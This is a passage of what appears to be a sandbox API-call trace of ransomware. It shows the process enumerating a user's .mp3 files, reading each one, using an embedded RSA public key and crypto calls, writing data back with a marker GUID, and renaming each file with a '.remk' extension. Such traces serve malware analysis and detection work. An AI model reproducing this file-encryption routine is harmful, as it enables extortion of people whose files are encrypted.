lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.167] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0234.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0234.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0234.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0234.168] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.168] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0234.168] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0234.168] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.168] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.168] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.168] CloseHandle (hObject=0x640) returned 1 [0234.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185c10 [0234.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x37bc408 [0234.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185c10 | out: hHeap=0x630000) returned 1 [0234.170] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\dbHnWPIPAcwCYg3Bdmu.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gg6lar4dxdzoqomzj1ul\\dbhnwpipacwcyg3bdmu.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\dbHnWPIPAcwCYg3Bdmu.mp3.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gg6lar4dxdzoqomzj1ul\\dbhnwpipacwcyg3bdmu.mp3.remk")) returned 1 [0234.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc408 | out: hHeap=0x630000) returned 1 [0234.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.172] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0234.173] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b1d1580, ftCreationTime.dwHighDateTime=0x1d5dbd1, ftLastAccessTime.dwLowDateTime=0x7adfff30, ftLastAccessTime.dwHighDateTime=0x1d5e4c8, ftLastWriteTime.dwLowDateTime=0x7adfff30, ftLastWriteTime.dwHighDateTime=0x1d5e4c8, nFileSizeHigh=0x0, nFileSizeLow=0x7d19, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j-9 8ML8KY7J4.mp3", cAlternateFileName="J-98ML~1.MP3")) returned 1 [0234.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0234.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbe) returned 0x31c7810 [0234.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0234.173] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\j-9 8ML8KY7J4.mp3") returned=".mp3" [0234.173] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\j-9 8ML8KY7J4.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gg6lar4dxdzoqomzj1ul\\j-9 8ml8ky7j4.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.175] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=32025) returned 1 [0234.175] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.178] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x7cf3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.178] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.180] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.180] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x7d19, lpOverlapped=0x0) returned 1 [0234.181] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.181] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.181] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.181] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.181] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0234.182] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.182] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.182] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.182] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.182] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.182] GetLastError () returned 0x0 [0234.182] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.182] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0234.182] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.182] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.182] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.182] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.183] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.183] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d20) returned 0x37c4278 [0234.183] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0234.183] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0234.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0234.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0234.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bbfa8 [0234.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee658 [0234.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bbff0 [0234.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee670 [0234.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6a0 [0234.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee700 [0234.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6b8 [0234.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0234.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0234.184] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.184] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6a0 | out: hHeap=0x630000) returned 1 [0234.184] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6b8 | out: hHeap=0x630000) returned 1 [0234.184] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee700 | out: hHeap=0x630000) returned 1 [0234.184] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0234.184] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee700 [0234.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0234.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee6b8 [0234.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0234.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee6a0 [0234.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0234.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x3192918 [0234.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0234.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0234.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0234.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0234.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6b8 | out: hHeap=0x630000) returned 1 [0234.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6a0 | out: hHeap=0x630000) returned 1 [0234.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0234.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee700 | out: hHeap=0x630000) returned 1 [0234.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0234.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0234.185] GetCurrentThreadId () returned 0x314 [0234.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0234.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c2c20 [0234.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0234.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0234.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0234.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0234.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0234.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.186] GetCurrentThreadId () returned 0x314 [0234.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0234.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0234.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0234.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0234.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee700 [0234.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0234.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0234.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0234.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0234.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0234.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6a0 [0234.187] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0234.187] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0234.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0234.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0234.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6b8 [0234.187] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0234.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0234.187] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0234.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee688 [0234.187] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0234.187] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee718 [0234.187] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.188] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x7d19, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.188] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.188] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.188] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.188] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.188] CloseHandle (hObject=0x640) returned 1 [0234.190] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\j-9 8ML8KY7J4.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gg6lar4dxdzoqomzj1ul\\j-9 8ml8ky7j4.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\j-9 8ML8KY7J4.mp3.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gg6lar4dxdzoqomzj1ul\\j-9 8ml8ky7j4.mp3.remk")) returned 1 [0234.191] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc408 | out: hHeap=0x630000) returned 1 [0234.191] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.191] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.192] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0234.193] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42c19d00, ftCreationTime.dwHighDateTime=0x1d5e781, ftLastAccessTime.dwLowDateTime=0x6e82140, ftLastAccessTime.dwHighDateTime=0x1d5e0bb, ftLastWriteTime.dwLowDateTime=0x6e82140, ftLastWriteTime.dwHighDateTime=0x1d5e0bb, nFileSizeHigh=0x0, nFileSizeLow=0x121b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="M19pxLEndmqvY AcHQ.mp3", cAlternateFileName="M19PXL~1.MP3")) returned 1 [0234.193] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\M19pxLEndmqvY AcHQ.mp3") returned=".mp3" [0234.193] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\M19pxLEndmqvY AcHQ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gg6lar4dxdzoqomzj1ul\\m19pxlendmqvy achq.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.194] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=74161) returned 1 [0234.194] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.197] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1218b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.197] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.199] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x121b1, lpOverlapped=0x0) returned 1 [0234.200] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.200] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.200] lstrlenA (lpString="-----BEGIN PUBLIC 